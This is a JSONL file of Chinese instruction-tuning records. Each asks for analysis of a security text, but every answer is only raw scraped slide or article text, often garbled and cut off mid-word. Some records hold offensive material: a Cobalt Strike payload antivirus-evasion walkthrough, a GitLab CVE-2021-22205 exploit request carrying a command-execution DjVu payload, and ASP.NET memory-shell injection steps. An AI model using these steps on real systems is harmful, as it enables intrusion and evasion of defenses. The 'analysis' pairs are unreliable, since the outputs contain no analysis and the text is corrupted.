{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSputnik-II Economical Multi-Band Antenna Version 2.0  04-01-2010 BANDS: A B C D 2m  1.25m  70cm 19 ½ 1 12 ⅜ 21 2m  70cm 19 ½ 1 6 21 Antenna Versions: The antenna was originally designed to cover 2m  1.25m  70cm in a single ground plane style unit. The design utilizes 2 elements for the radiator, the longer of which operates as a ¼ wave at 2m and a ¾ wave at 70cm. The short element is ¼ wavelength at 1.25m which is also a ½ wave at 70cm and appears to be a short, directing the energy on 70cm to the more attractive ¾ wave element. ¾ wavelength antennas however are not very desirable for ground to ground use because of the large lobe emitted 45 degrees upwards. This trait may be desirable for stations trying to use a repeater at the base of the mountain it is located on or for knife edging DX stations in a mountainous region. The sky wave lobes have approximately 4dB additional gain above the ground wave on this band. If 1.25m operation is not desired the antenna may be constructed as a 2m  70cm Dual-Band antenna which has better ground wave performance, by making the shorter element a ¼ wave on 70cm. A slight gain increase is noted on the elevation plane in the direction of the shorter stub in this version; the azimuth pattern is approximately Omni-directional. Please refer to Dual- Band 2m  70cm Elevation and SWR Charts later in this document. Bronze welding rod is used as the elements because that was readily available at the hardware store visited during construction of the prototype antenna. Electrical performance will be increased if copper or brass rods 36 in length are obtainable. Construction Materials: Item Description Qty Cost Each Radiator 1/8 x 36 Bronze Welding Rod 1 $2.39 Ground Plane 3/32 x 36 Bronze Welding Rod 4 $1.29 Housing 1 ¼ PVC End Cap 1 $0.49 Mast Random Length of 1 ¼ PVC Pipe Per Foot $1.19 Connector SO-239 1 $2.39 Coaxial Cable RG-58 Per Foot $0.30 Connectors PL-259 2 $2.39 Reducer PL-259 to RG-58 2 $0.39 Epoxy JB Weld 1 $4.49 Construction: B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmd5sum === 计算和校验文件报文摘要的工具程序 ## 补充说明 **md5sum命令** 采用MD5报文摘要算法128位计算和检查文件的校验和一般来说安装了Linux后就会有md5sum这个工具直接在命令行终端直接运行 MD5算法常常被用来验证网络文件传输的完整性防止文件被人篡改MD5 全称是报文摘要算法Message-Digest Algorithm 5此算法对任意长度的信息逐位进行计算产生一个二进制长度为128位十六进制长度就是32位的指纹或称报文摘要不同的文件产生相同的报文摘要的可能性是非常非常之小的 ### 语法 ```shell md5sum(选项)(参数) ``` ### 选项 ```shell -b二进制模式读取文件 -t或--text把输入的文件作为文本文件看待 -c从指定文件中读取MD5校验和并进行校验 --status验证成功时不输出任何信息 -w当校验不正确时给出警告信息 ``` ### 参数 文件指定保存着文件名和校验和的文本文件 ### 实例 **使用 md5sum 生成密码** 另一种获取可用作密码的随机字符串的方法是计算 MD5 校验值校验值看起来确实像是随机字符串组合在一起我们可以用作密码确保你的计算源是个变量这样的话每次运行命令时生成的校验值都不一样比如 date date 命令 总会生成不同的输出 ```shell [root@localhost ~]# date | md5sum 6a43f2c246cdc3e6a3592652f831d186 - ``` **生成一个文件insert.sql的md5值** ```shell [root@localhost ~]# md5sum insert.sql bcda6cb5c704664f989703ac5a88f112 insert.sql ``` **检查文件testfile是否被修改过** 首先生成md5文件 ```shell md5sum testfile > testfile.md5 ``` 检查 ```shell md5sum testfile -c testfile.md5 ``` 如果文件没有变化输出应该如下 ```shell forsort: OK ``` 此时md5sum命令返回0 如果文件发生了变化输出应该如下 ```shell forsort: FAILED md5sum: WARNING: 1 of 1 computed checksum did NOT match ``` 此时md5sum命令返回非0 这里检查用的文件名随意如果不想有任何输出则`md5sum testfile --status -c testfile.md5`这时候通过返回值来检测结果 检测的时候如果检测文件非法则输出信息的选项: ```shell md5sum -w -c testfile.md5 ``` 输出之后文件异常输出类似如下 ```shell md5sum: testfile.md5: 1: improperly formatted MD5 checksum line md5sum: testfile.md5: no properly formatted MD5 checksum lines found ``` 这里testfile.md5只有一行信息但是我认为地给它多加了一个字符导致非法如果md5文件正常那么`-w`有没有都一样", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTraining the Next Generation of Hardware Hackers Teaching Computer Organization and Assembly Language Hands-On with Embedded Systems Wednesday, May 5, 2010 Development  Took about a year to develop and run through our first semester with the material  We want to share our ideas, what we learned, and the tools we built with everyone  We want to try to spread the hardware hacking culture Wednesday, May 5, 2010 Goals  Get Undergraduate Electrical Engineering and Computer Science students thinking closer to the metal  Computer organization is an integral part understanding what your code does  Assembly Language facilitates learning how Computers and Microprocessors work  Why teach Assembly Language? Wednesday, May 5, 2010 Assembly Language  For the actual design process, many times it far easier and far more cost effective to use C or other high-level languages  However, Assembly puts you down closer to the machine, and give you the perspective to understand whats happening  Learn the hard way, then use the Enlightened way (high-level language) once you understand the fundamentals Wednesday, May 5, 2010 How?  Put a development kit in the hands of every student taking the course  Flatten the learning curve of working with embedded systems  Give each student a free, easy-to-use tool- chain with which to work Wednesday, May 5, 2010 Learning Curve  Embedded Development is surprisingly difficult to get into for newbies  Embedded Systems IDEs can be very clunky and hard to use (Eyes toward Freescale)  Projects like Arduino have made lots of headway - still not optimal for Comp. Org.  Needed a better set of tools Wednesday, May 5, 2010 The Bootloader  On-chip ROM Bootloader from the factory  USB boot-loader allows loading code from a students PC  No expensive device-specific programmer needed  Problem: Current Boot-loader is from the manufacturer and it only works with Windows (were going to fix that) Wednesday, May 5, 2010 Development Board  Uses Freescale MC9S08JS16 chip  Single", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一分钟免杀cobaltstrike 收录于话题 #cobaltstrike 1 #免杀 1 #渗透测试 48 #内网安全 3 #代码 2 简要介绍 本次利用到的是Nim语言 1.Nim 是一门开源的编程语言 2.Nim 的独到之处在于它可以编译成其他编程语言代码主要是 C 语言和 JavaScript 3.将 Nim 与 C 语言或 JavaScript 代码集成在一起可以获得最大的价值 4.Nim 可以生成高质量的 C 语言代码避免出现 C 语言的典型错误如内存泄露和数组指针错误 下载Nim安装包 https://nim-lang.org/install.html 官方提供WindowsLinuxMac版本根据自己的需求进行下载 本次使用Windows环境做演示 小生观察室 本观察室仅个人做内容存档使用 63篇原创内容 公众号 前天 原创 Kobefanss 小生观察室 下载解压后需将 bin 目录添加到环境变量 安装CC++编译器 Nim编译器需要C编译器才能编译软件 下载地址 https://github.com/GorvGoyl/MinGW64/releases 将文件解压到nim目录的 dist 路径下并将 D:\\nim-1.4.8\\dist\\MinGW64\\bin 添加至环境变量 encryption编译 下载地址 https://github.com/aeverj/NimShellCodeLoader/releases 下载解压后进入 NimShellCodeLoader_Winx64\\NimShellCodeLoader\\encryption 目录利用下面 的代码进行编译 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 免杀详情 利用 Nim+NimShellCodeLoader 可以有10多种免杀方式绕过全网杀软这里演示其中一种 cobaltstrike生成 raw 格式 64位 的 payload.bin 文件 打开 codeLoader.exe 图形化界面将 payload.bin 直接拖进来 这里选择的是直接加载 TDEA -- Direct Load 选好加载方式和加密方式点击 generate 即可导出 输出生成的可执行文件在 NimShellCodeLoader_Winx64\\NimShellCodeLoader\\bin 目录 最终效果 本地测试火绒360管家等均可免杀并附上VT和CS正常上线结果 喜欢此内容的人还喜欢 Flink第二十六篇源码角度分析Task执行过程 章鱼沉思录 2021年vue和react如何选择 程序那些事儿 springboot 项目敏感信息脱敏实践 地道程序员", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CVE-OLON-OOOLS Gitlab 前台RCE 分析之 P 接 https://t.zsxq.com/aYZzVbu 公众号 https://mp.weixin.qq.com/s? __biz=Mzg4NzcxMDgyOA==&mid=2247483654&idx=1&sn=8c0f99c646e63460d3190508613cac4 5&chksm=cf877405f8f0fd1382100c97af86db549084b987c515c848eb8a7faa92eaac7b5aeb0ac9 2ece#rd ========================================================================== ====== 从前的分析其实可以继续问个问题 1除了 uploads/user 接还有其他接么 2是否真的需要 CSRF 或者说 第步是否是真的需要 对于 部分 规则性的 waf最简单的可能就是 正则匹配内容 请求法/路径/POST包基本 上封杀掉下这个模式已经能挡住绝部分脚本了吧 2 但从我前的 第2 部分来看 其实 routes.go 中的其他路由 可以拿过来利 环境搭建 使 https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021- 22205/README.zh-cn.md 感谢P师傅 例如 snippetUploadPattern 为 Go 复制代码 POST /uploads/user HTTP/1.1 Content-Type: multipart/form-data; boundary=22f5e4b5ec8883262a0a1e07619d0efd Content-Type: image/jpeg AT&TFORM[DJVUINFO ,BGjpANTa5(metadata (Copyright \"\\ \" . qx{command} . \\ \" b \") ) --22f5e4b5ec8883262a0a1e07619d0efd-- 1 2 3 4 5 6 7 8 9 10 11 12 Go 复制代码 // Uploads u.route(\"POST\", projectPattern+`uploads\\z`, upload.Accelerate(api, signingProxy, preparers.uploads)), u.route(\"POST\", snippetUploadPattern, upload.Accelerate(api, signingProxy, preparers.uploads)), u.route(\"POST\", userUploadPattern, upload.Accelerate(api, signingProxy, preparers.uploads)), 1 2 3 4 Go 复制代码 snippetUploadPattern = `/uploads/personal_snippet` 1 3 其他路由也可以试试有可能需要登陆  来解决第个问题= = CSRF Token 真的需要吗 回到 routes.go Go 复制代码 projectPattern = `/([/]+/){1,}[/]+/` u.route(\"POST\", projectPattern+`uploads\\z`, upload.Accelerate(api, signingProxy, preparers.uploads)), POST /1/1/uploads 1 2 3 4 5 4 先来看下 gitlab-workhorse 的是怎么匹配路由的 Go 复制代码 // Routing table // We match against URI not containing the relativeUrlRoot: // see upstream.ServeHTTP func configureRoutes(u *upstream) { preparers := createUploadPreparers(u.Config) uploadPath := path.Join(u.DocumentRoot, \"uploads/tmp\") uploadAccelerateProxy := upload.Accelerate(&upload.SkipRailsAuthorizer{TempPath: uploadPath}, proxy, preparers.uploads) ... // Serve static files or forward the requests def", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 ASP.NET下的内存()filter内存 前 过程 总结 @yzddmr6 asp.net下的内存研究章较少前提到过的包括虚拟路径内存以及HttpListener内存周末 研究了下其他类型的内存发现.net可以利的地要多得多所以准备写个系列章讲讲 asp.net下的内存 章仅作研究性质不保证任何实战效果请勿于法途 java下有filterservlet等拦截器asp.net mvc也有同样类似的机制 在rider中新建个asp.net web项默认就会起个asp.net mvc的项 前 过程 2 根录下有个 Global.asax件这个件会在web应启动后先执其中Codebehind指向了 Global.asax.cs在Global.asax.cs中可以看到在asp.net mvc启动的时候会默认去注册三个组件 3 看下FilterConfig.RegisterGlobalFilters这个法的作就是给全局GlobalFilterCollection加 我们定义的filter逻辑于为什么不去看route因为filter的优先级在route之前当然是我们的第 选择 内存的本质是在容器中注段恶意代码并且由于容器的特性如filterservlet等机制使得每次 收到web请求我们的恶意代码都会被执 在java中添加filter内存较为麻烦需要反射从上下中获取到filterMap等信息然后向注我 们定义的filter但是在asp.net中则直接将这个接给户暴露了出来这就极便了我们注 内存的操作 看了下System.Web.Mvc.GlobalFilterCollection从注释就可以看出来这存放了全局的filter C++ 复制代码 namespace WebApplication2 { public class MvcApplication : System.Web.HttpApplication { protected void Application_Start() { AreaRegistration.RegisterAllAreas();//注册 MVC 应程序中的所有区域 FilterConfig.RegisterGlobalFilters(GlobalFilters.Filters);//注 册filter RouteConfig.RegisterRoutes(RouteTable.Routes);//注册路由 BundleConfig.RegisterBundles(BundleTable.Bundles);//打包捆绑资 源对css以及js进压缩 } } } 1 2 3 4 5 6 7 8 9 10 11 12 13 C++ 复制代码 namespace WebApplication2 { public class FilterConfig { public static void RegisterGlobalFilters(GlobalFilterCollection filters) { filters.Add(new HandleErrorAttribute()); } } } 1 2 3 4 5 6 7 8 9 10 4 那么应该打什么类型的filter呢翻了下档ASP.NET MVC 框架持四种不同类型的筛选器 1. 授权筛选器 = 实现IAuthorizationFilter属性 2. 操作筛选器 = 实现IActionFilter属性 3. 结果筛选器 = 实现IResultFilter属性 4. 异常筛选器 = 实现IExceptionFilter属性 筛选器按上列出的顺序执 例如授权筛选器始终在操作筛选器和异常筛选器始终在每种其他类 型的筛选器之后执 授权筛选器于实现控制器操作的身份验证和授权 例如\"授权\"筛选器是授权筛选器的示例 操作筛选器包含在控制器操作执之前和之后执的逻辑 例如可以使操作筛选器修改控制器操作 返回的视图数据 结果筛选器包含在执视图结果之前和之后执的逻辑 例如您可能希望在视图呈现给浏览器之前修 改视图结果 异常筛选器是要运的最后种筛选器类型 可以使异常筛选器来处理控制器操作或控制器操作结果 引发的错误 您还可以使异常筛选器来记录错误 每种不同类型的筛选器都按特定顺序执 如果要控制执相同类型的筛选器的顺序则可以设置筛选 器的 Order 属性 所有操作筛选器的基类是类System.Web.Mvc.FilterAttribute 如果要实现特定类型的筛选器则需要 创建从基本筛选器类继承的类并实现个或多个IAuthorizationFilter IActionFilter或 IResultFilter``IExceptionFilter接 5 以上来微软档https://doc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 磁盘内存分析常用工具 - EasyRecovery - MedAnalyze - FTK - [Elcomsoft Forensic Disk Decryptor](https://ctf-wiki.github.io/ctf-tools/misc/#_6) - Volatility ### 磁盘相关介绍 常见的磁盘分区格式有以下几种 - Windows: FAT12 -> FAT16 -> FAT32 -> NTFS - Linux: EXT2 -> EXT3 -> EXT4 - FAT 主磁盘结构 - 删除文件目录表中文件名第一字节 `e5` ### VMDK文件介绍 VMDK 文件本质上是物理硬盘的虚拟版也会存在跟物理硬盘的分区和扇区中类似的填充区域我们可以利用这些填充区域来把我们需要隐藏的数据隐藏到里面去这样可以避免隐藏的文件增加了 VMDK 文件的大小如直接附加到文件后端也可以避免由于 VMDK 文件大小的改变所带来的可能导致的虚拟机错误而且 VMDK 文件一般比较大适合用于隐藏大文件 ### 内存类题目介绍 - 解析 Windows / Linux / Mac OS X 内存结构 - 分析进程内存数据 - 根据题目提示寻找线索和思路提取分析指定进程的特定内存数据", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPDA insecurity Insecurity in a mobile world Bryan Glancey Agenda  PocketPC Overview  Registry  Synchronization  HP 5455 Biometric issue  Palm Overview  General Issues  Conclusion PocketPC  ActiveSync USB/Serial BlueTooth TCP/IP PocketPC Toolkit  Registry Editors  www.pocketpcdn.com/articles/registry.html  RedBack  www.atstake.com/research/tools/forensics  Snort  Airsnort  Airsnort.shmoo.com  www.snort.org PocketPC Registry  Windows Like Registry Settings  Edit the registry remotely  Edit it on the device  Password Screen Control  http://support.microsoft.com/default.aspx ?scid=kb;en-us;314989  Interesting Values Security Related Values  HKEY_LOCAL_MACHINE\\Comm  HKEY_LOCAL_MACHINE\\Drivers  HKEY_LOCAL_MACHINE\\HARDWARE  HKEY_LOCAL_MACHINE\\SYSTEM  HKEY_LOCAL_MACHINE\\Init  HKEY_LOCAL_MACHINE\\WDMDrivers  [HKEY_CLASES_ROOT\\.cpl] (default) = \"cplfile\" [HKCR\\cplfile\\Shell\\Open\\Command] (default) = \"\\Windows\\ctlpnl.exe %1\" Where to get more information?  Microsoft How to switch the password screen  Q314989 - Let Me In: Pocket PC Password User Interface Redirect Sample  http://support.microsoft.com/default.aspx?scid=kb;en- us;314989 PocketPC attacks  Activesync cradle  Data security is unidirectional  you can put a system password on PocketPC but not on Laptop  ActiveSync DOS  http://www.irmplc.com/advisories The (ActiveSync) service runs on TCP port 5679 and by connecting to this port and sending  Removable media Example: HP Ipaq 5455 5455 Weaknesses  Synchronization Security  Spontaneous Password Lapses  http://forums.itrc.hp.com/cm/QuestionAn swer/1,,0x504cb82b2d63d71190080090 279cd0f9,00.html  Removable Media Security  New definition of Plug & Play Palm  HotSync Vulnerabilities  NotSync  http://www.atstake.com/research/advisories/2000/a092600- 1.txt  PDD Palm Toolkit  PDD  NotSync  PDA Seizure  http://www.paraben- forensics.com/index.html  RsrcEdit  http://www.quartus.net/prod ucts/rsrcedit/  File Manager/editor for PalmOS Palm  Palm Memo hiding Vulnerability  www.security", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives the '\\\" option's name as specified in the class command, dbName gives '\\\" the option's name in the option database, and dbClass gives '\\\" the option's class in the option database. '\\\" '\\\" .UL arg1 arg2 '\\\" Print arg1 underlined, then print arg2 normally. '\\\" '\\\" RCS: @(#) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-Mimikatz源码调试 前期准备 mimikatz源码地址 调试环境 vs2019 几点设置 1. 因为官方项目没有debug方案所以需要手动添加debug配置 2. 项目属性配置 程序入口 调试以 privilege::debug 为例打开调试-> mimikatz 调试属性->配置属性->调试->命令参数 wmain()是 mimikatz`的入口函数 命令分发 从上面的循环中获取到请求参数之后就进入到命令分发的 mimikatz_dispatchCommand() 函数 这里首先有一个 kull_m_file_fullPath 方法然后进行匹配暂时不知道具体作用是什么之 后进入 mimikatz_doLocal() 方法 命令执行 在对命令进行请求分发之后获取到 module 和 commond 两个参数之后就进入了命令执行的阶段 这个地方涉及到结构体的知识 首先 mimikatz_modules[] 是一个数组数组里面存放的是每一个模块的结构体的指针那么第 210行就是将 module 的值和每个模块结构体中定义的 shortName 进行比较如果相同返回0 结构体的结构在 kuhl_m.h 这个头文件中进行定义 之后第213和214两行相同的方式去寻找同一个模块下存在的 command 每个模块都预先定义一个 数组存放全部的可执行方法的信息 最重要的就是第215行 status = mimikatz_modules[indexModule]- >commands[indexCommand].pCommand(argc - 1, argv + 1); 执行这个模块和命令 mimikatz_modules[indexModule]->commands[1] 这一步相当于找到了 kuhl_m_c_privilege[] 这个数组的第一个元素然后这个 const KUHL_M_C kuhl_m_c_privilege[] 数组是一个结构体数组这个第一项表示的是一个 指针函数 那后面 的 .pCommand(argc - 1, argv + 1) 就是去调用 kuhl_m_privilege_debug 这个函数 可以看到的是对于 privilege::debug 这个功能执行的函数是 kuhl_m_privilege_simple() 而最后调用的系统API是 RtlAdjustPrivilege()  至此整个简单的流程分析已经结束了关于 mimikatz 的请求流程和命令分发已经了解清楚 了 NTSTATUS kuhl_m_privilege_simple(ULONG privId) { ULONG previousState; NTSTATUS status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState); if(NT_SUCCESS(status)) kprintf(L\"Privilege \\'%u\\' OK\\n\", privId); else PRINT_ERROR(L\"RtlAdjustPrivilege (%u) %08x\\n\", privId, status); return status; }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 24 Side-channel attacks on high- security electronic safe locks plore@tuta.io Background  Electronic safe locks Image: ellenm1 on Flickr / CC BY-NC Background  Electronic safe locks  In scope: decent, listed locks  UL Type 1 High-security electronic lock  Out of scope: cheap, poor-quality locks Sargent & Greenleaf 6120-332 6120  System model MCU Outside of safe Battery Keypad EEPROM Bolt motor Inside of safe Lock Steel safe door ¼ hole for wires Buzzer 6120  Circuit model Data line volts 100 k Data line Volts across R1 Current through R1 R1 1 0 0 volts 5 volts 50 A 0 A Higher current consumption means the bit being read from EEPROM is a 0, and a lower current means the bit is 1 Vcc Bit value 5 volts 0 volts EEPROM Amplifier Oscilloscope Sense Resistor Battery MCU 6120  Power analysis  1 nibble per keycode digit  Only lower byte in each EEPROM word is used 6120  Demo S&G Titan PivotBolt Titan  Timing attack  Entire six-digit keypad sequence is captured before starting comparison to key from EEPROM  Pseudocode of Titan keycode comparison: bool check_code(int enteredCode[6], int actualCode[6]) { for (int digit = 0; digit < 6; digit++) if (enteredCode[digit] != actualCode[digit]) return false; return true; } Each iteration takes another 28 s Titan  Timing attack  Current consumption markers for timing delta Titan  Timing attack Current Time Suppose that the actual code is 908437 Code tried Current trace 123456 Current Time 923456 Current Time 913456 Current Time 903456 Correct run length 0 1 1 2 Wrong Wrong Wrong Wrong Titan  Timing attack  The more digits you have correct, the more delayed the current-consumption rise Titan  Lockout Try wrong keycode failureCount++ EEPROM Failure count >= 5 LOCKOUT Titan  EEPROM write example Starting value: 0xA4 Time from start of write Write value: 0x1C Value in EEPROM 400 s 0xA4 2500 s 3000 s 0 500 s 0x?? 0x00 0x?? 0x1C Titan  Interrupt EEPROM write 2.7v Brownout 600 s from detection 1.1 ms from write start Supply voltage Cu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVirtualization: Enough Holes to Work Vegas Defcon 15 Las Vegas, 2007 D.J. Capelis University of California, San Diego Introductory Notes  Mostly known issues  Mostly design flaws, not entirely bugs  Documented behavior  (So slightly less testing)  VMWare Server, not ESX or VI3.  This is still untenable Overview  Review  Isolation isn't  Covert channels  Virtual machines on a network  Virtual machines changing the network  Live migration  Questions, heckling, grandiose proposals and accusations of hating freedom Overview of Technologies Technology  OS Level Virt  Paravirtualization  Full Virt w/ HW  Full Virt w/o HW  Full Emulation Example  Zones/UML/openVZ  Xen  KVM, Xen  VMWare, KQEmu  QEmu, Bochs Faster Completeness The Features  Freeze / Thaw / Snapshotting  Decoupled Hardware  Another Layer of Protection  Live Migration  Dynamic Deployment / Creation The Hype  Reliability  No longer bound to hardware, who cares about failures!  Consolidation  Take many machines, use less of them. Better utilization of physical hardware.  Isolation  Take many tasks, isolate them from each other. Don't you feel more secure already? Attacking Isolation  Shared hardware attacks  Thought the SMT attacks were old news?  Similar things on other shared hardware  Attacking the host scheduler  Did you want to actually... use that video card? (Or other hardware device? USB?)  Moment you pass real hardware, you can wedge the entire box.  Covert Channels More on Covert Channels  Use Resources  Use something on one  Detect on another  RDTSC can help (or any half-decent timesource)  Pass data in Layer 2  Turns out... very few of us use EBTables.  Mess with Novell, use IPX  More of an Apple hater? Use appletalk!  Old School? Want to try DECNet? Networking Issues  Bypass host firewall  Pick whatever IP you'd like  VMWare bypasses by default in bridged mode  Promiscuous Mode  MAC impersonation  Spoofing is easier again The VMWare Model (Default) VM VM VM VM VM .... Host Host Rest of the Network T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefense by Numb3r5 Making problems for script k1dd13s and scanner monkeys @ChrisJohnRiley THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING SOCRATES: APOLOGY, 21D TL ;DR Goals for this talk Describe the defensive uses of HTTP status codes 1) What 2) Why 3) How 4) Goals 5) Bringing it together 6) Review #1 ] [ WHAT ? HTTP STATUS CODES Seems like such a Small detail  small detail, big impact This talk contains: - Numbers - Bad Jokes - Traces of peanuts - Did I mention numbers? HTTP Status Codes  Majority part of RFC 2616 (HTTP/1.1)  5 main classes of response  1XX informaOonal  2XX success  3XX redirecOon  4XX client error  5XX server error HTTP Status Codes  Proposed RFC* for 7XX codes  Examples:  701 Meh  719 I am not a teapot  721 Known unknowns  722 Unknown unknowns  732 Fucking Unicde * h]ps://github.com/joho/7XX-rfc BASICS AKA: THE BORING THEORY BIT #1.1 1XX Informaeonal  Indicates response received  Processing is not yet completed  100 Conenue  101 Switching Protocols  102 Processing (WebDAV RFC 2518) 2XX Success  Indicates response received  Processed and understood  200 OK  201 Created  202 Accepted  203 Non-Authoritaeve Informaeon  204 No Content 2XX Success (cont.)  205 Reset Content  206 Pareal Content  207 Mule-Status (WebDAV RFC 4918) Codes not supported by Apache  208 Already Reported  226 IM Used  250 Low on Storage Space 3XX Redireceon  Aceon required to complete request  300 Muleple Choices  301 Moved Permanently  302 Found / Moved Temporarily  303 See Other  304 Not Modified 3XX Redireceon (cont.)  305 Use Proxy  306 Switch Proxy  307 Temporary Redirect Codes not supported by Apache  308 Permanent Redirect 4XX Client Error  Client caused an error  400 Bad Request  401 Unauthorized  402 Payment Required  403 Forbidden  404 Not Found  405 Method Not Allowed 4XX Client Error (cont.)  406 Not Accessible  407 Proxy Authenecaeon Required  408 Request Timeout  409 Conflict  410 Gone  411 Length Required 4XX Client Error (cont.)  412 Precondieon Failed  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Your Thoughts: Batman Forever meets Black Mirror Katherine Pratt DEFCON 27 10 Aug 19 The Standard Disclaimer The work in this presentation was done at the University of Washington as part of a PhD dissertation. The results and views presented here do not necessarily represent those of my funding sources or my current employer. 2 3 PLEASE NOTE: There is a difference between telepathy and targeted elicitation of information. 4 PLEASE NOTE: There is a difference between telepathy and targeted elicitation of information. Things NOT Covered by This Presentation  Aliens are not involved  I know nothing about any chips that the government has implanted 5 Summary of Presentation  Motivating the research  Some experimental result  Do consumers care about their neural privacy?  Thoughts about proactive policy solutions  What do I want all of you to do? 6 Motivating the Research 7 Data in the 21st Century  Targeted advertising and consumer profiles are a boon for commercialism, but require massive amounts of data 8 Data in the 21st Century  Targeted advertising and consumer profiles are a boon for commercialism, but require massive amounts of data  Companies are searching for more ways to learn about consumers, including finding untapped sources of data 9 Data in the 21st Century  Targeted advertising and consumer profiles are a boon for commercialism, but require massive amounts of data  Companies are searching for more ways to learn about consumers, including finding untapped sources of data  Obtaining biometrics, or bodily-based information, is becoming feasible with wearables and smartphones 10 Data in the 21st Century  Targeted advertising and consumer profiles are a boon for commercialism, but require massive amounts of data  Companies are searching for more ways to learn about consumers, including finding untapped sources of data  Obtaining biometrics, or bodily-based information, is becoming feasible with wearables and smartphones  Another source of biometric i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n101 Ways to Brick Your Hardware (With some un-bricking tips sprinkled in for good measure) Joe FitzPatrick & Joe Grand (Kingpin) Overview Whats a Brick? Kinds of Bricks 001: Bricking Firmware 010: Bricking PCBs 011: Bricking Connectors 100: Bricking ICs 101: Bricking WTF scenarios Recap and Best Practices Whats a Brick? Whats a Brick?  Shows signs of life  Doesnt boot or work as intended  May be soft-unbrickable  Typically a software or configuration problem Soft Brick Hard Brick  Little or no sign of life  Doesnt even power on or flash lights  Probably needs hardware hacking to fix it 101 Kinds of Bricks 001: Bricking Firmware 010: Bricking PCBs 011: Bricking Connectors 100: Bricking ICs 101: Bricking WTF scenarios Blanking, wiping, erasing, corrupting, or otherwise invalidating your devices firmware 001: Bricking Firmware > xxd firmware.bin 0000000: dead dead dead dead dead dead dead dead ................ 0000010: dead dead dead dead dead dead dead dead ................ 0000020: dead dead dead dead dead dead dead dead ................ 0000030: dead dead dead dead dead dead dead dead ................ 0000040: dead dead dead dead dead dead dead dead ................ 0000050: dead dead dead dead dead dead dead dead ................ 0000060: dead dead dead dead dead dead dead dead ................ Flashing Bad Firmware: DEFCON 18 Bootloader  Bootloader not in protected region  Screw up during linking can cause bootloader to be overwritten  Un-bricked through JTAG interface & MC56F8006 development tools Wiping Critical Sections: Chromebook Firmware  binwalks histogram shows entropy in a file  Top: Physical extraction of BIOS via SPI  Bottom: Software dump via flashrom  The two firmwares are different because the CPU blocks access to the ME region for software reads ? Wiping Critical Sections: Chromebook Firmware Touching Signed Filesystems: Acer C720 Chromebook  Mount R/O filesystem as R/W  Make changes and reboot  Kernel verifies rootfs before mounting  Mismatch causes error C", "category": "text_analysis", "source": "security_papers"}
